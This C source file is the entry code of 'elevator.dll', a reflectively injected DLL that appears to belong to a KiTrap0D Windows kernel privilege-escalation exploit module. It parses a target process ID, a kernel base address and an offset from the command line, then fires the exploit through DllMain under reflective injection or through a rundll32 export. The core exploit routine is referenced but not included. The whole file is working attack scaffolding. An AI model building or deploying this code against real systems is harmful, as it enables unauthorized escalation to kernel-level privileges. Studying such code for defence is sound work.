
//
// Note: To use the produced x86 dll on NT4 we use a post build event "editbin.exe /OSVERSION:4.0 /SUBSYSTEM:WINDOWS,4.0 elevator.dll"
// in order to change the MajorOperatingSystemVersion and MajorSubsystemVersion to 4 instead of 5 as Visual C++ 2008
// can't build PE images for NT4 (only 2000 and up). The modified dll will then work on NT4 and up. This does
// not apply to the produced x64 dll.
//
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../common/ReflectiveLoader.c"
#include <limits.h>
#include <stdlib.h>
#include <string.h>
#include "kitrap0d.h"
#include "../common/common.h"
/*!
 * @brief Parse the \c DWORD that follows a given switch in the command line.
 * @example elevator_command_dword( "/FOO:0x41414141 /BAR:0xCAFEF00D", "/FOO:" ) == 0x41414141
 * @param cpCommandLine Command line string to search (may be \c NULL).
 * @param cpCommand The switch, including its trailing colon, whose value is wanted.
 * @returns The value following \c cpCommand, parsed with base auto-detection
 *          (decimal, \c 0x hex, or leading-zero octal). Returns 0 when either
 *          argument is \c NULL, the switch is absent, or no number follows it.
 * @remark A genuine 0 is indistinguishable from "not found"; the callers in
 *         this file treat 0 as invalid for that reason.
 */
DWORD elevator_command_dword(char * cpCommandLine, char * cpCommand)
{
	char * cpValue;

	if (cpCommandLine == NULL || cpCommand == NULL) {
		return 0;
	}

	cpValue = strstr(cpCommandLine, cpCommand);
	if (cpValue == NULL) {
		return 0;
	}

	/* Skip the switch itself; strtoul skips any leading whitespace on its own. */
	return strtoul(cpValue + strlen(cpCommand), NULL, 0);
}
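/*!
 * @brief Parse the \c int that follows a given switch in the command line.
 * @example elevator_command_int( "/FOO:12345 /BAR:54321", "/FOO:" ) == 12345
 * @param cpCommandLine Command line string to search (may be \c NULL).
 * @param cpCommand The switch, including its trailing colon, whose value is wanted.
 * @returns The base-10 value following \c cpCommand, or 0 when either argument
 *          is \c NULL, the switch is absent, or no number follows it. Values
 *          outside the \c int range are clamped to \c INT_MIN / \c INT_MAX
 *          instead of hitting the undefined overflow behaviour of \c atoi.
 * @remark A genuine 0 is indistinguishable from "not found".
 */
int elevator_command_int(char * cpCommandLine, char * cpCommand)
{
	char * cpValue;
	long lValue;

	if (cpCommandLine == NULL || cpCommand == NULL) {
		return 0;
	}

	cpValue = strstr(cpCommandLine, cpCommand);
	if (cpValue == NULL) {
		return 0;
	}

	/* strtol, unlike atoi, has defined behaviour on overflow: it saturates at
	 * LONG_MIN/LONG_MAX, which is then clamped into the int range below. */
	lValue = strtol(cpValue + strlen(cpCommand), NULL, 10);
	if (lValue > INT_MAX) {
		return INT_MAX;
	}
	if (lValue < INT_MIN) {
		return INT_MIN;
	}
	return (int)lValue;
}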
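/*!
 * @brief The real entrypoint for this app: parse the exploit parameters and fire.
 * @param cpCommandLine Pointer to the command line supplied by the injector
 *        (see DllMain / the rundll32 export). \c NULL or empty means do nothing.
 * @remark The target PID, kernel base and offset are taken verbatim from the
 *         command line and handed to elevator_kitrap0d. Nothing here can verify
 *         that they match the running kernel — NOTE(review): the exploit appears
 *         to use them as-is, so a wrong base or offset is presumably a crash of
 *         the target rather than a clean failure; confirm in kitrap0d.c.
 * @remark Only the PID and kernel base are required; the offset defaults to 0
 *         when absent (the parser cannot tell "missing" from a literal 0).
 */
VOID elevator_main(char * cpCommandLine)
{
	DWORD dwProcessId = 0;
	DWORD dwKernelBase = 0;
	DWORD dwOffset = 0;

	/* %p rather than a DWORD cast: the cast silently truncates pointers in the x64 build. */
	dprintf("[KITRAP0D] elevator_main. cpCommandLine=%p", (void *)cpCommandLine);

	if (cpCommandLine == NULL || cpCommandLine[0] == '\0') {
		return;
	}

	dprintf("[KITRAP0D] elevator_main. lpCmdLine=%s", cpCommandLine);

	dwProcessId = elevator_command_dword(cpCommandLine, "/VDM_TARGET_PID:");
	dwKernelBase = elevator_command_dword(cpCommandLine, "/VDM_TARGET_KRN:");
	dwOffset = elevator_command_dword(cpCommandLine, "/VDM_TARGET_OFF:");

	/* 0 is the parser's "not found" value, so neither of these may be 0. */
	if (dwProcessId == 0 || dwKernelBase == 0) {
		dprintf("[KITRAP0D] Missing /VDM_TARGET_PID or /VDM_TARGET_KRN, not invoking exploit");
		return;
	}

	dprintf("[KITRAP0D] Invoking exploit");
	elevator_kitrap0d(dwProcessId, dwKernelBase, dwOffset);

	/* On success the exploit is not expected to return; reaching this line means it failed. */
	dprintf("[KITRAP0D] This shouldn't happen");
}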
/*!
 * @brief rundll32.exe entry point, invoked as "rundll32 elevator.dll,a <command line>".
 * @todo Remove this?
 * @param lpszCmdLine The argument string rundll32 hands to the export; it is
 *        forwarded unchanged to elevator_main.
 * @remark Never returns: the hosting process is terminated afterwards whether
 *         or not the exploit ran.
 */
VOID DLLEXPORT CALLBACK a(HWND hWnd, HINSTANCE hInstance, LPSTR lpszCmdLine, int nCmdShow)
{
	/* Only the command line is used; the other rundll32 arguments are ignored. */
	(void)hWnd;
	(void)hInstance;
	(void)nCmdShow;

	elevator_main(lpszCmdLine);
	ExitProcess(ERROR_SUCCESS);
}
/*!
 * @brief DLL entry point.
 * @remark When loaded via reflective DLL injection (RDI) lpReserved carries our
 *         command line and is forwarded straight to elevator_main. Under a plain
 *         LoadLibrary lpReserved is not expected to be a string, so this path is
 *         only meaningful through the RDI loader — NOTE(review): confirm no other
 *         load path reaches this DllMain with a non-NULL lpReserved.
 * @returns Always \c TRUE.
 */
BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
{
	if (dwReason == DLL_PROCESS_ATTACH) {
		/* hAppInstance is presumably defined by the included ReflectiveLoader.c. */
		hAppInstance = hInstance;
		if (lpReserved != NULL) {
			elevator_main((char *)lpReserved);
		}
	}

	/* DLL_PROCESS_DETACH / DLL_THREAD_ATTACH / DLL_THREAD_DETACH: nothing to do. */
	return TRUE;
}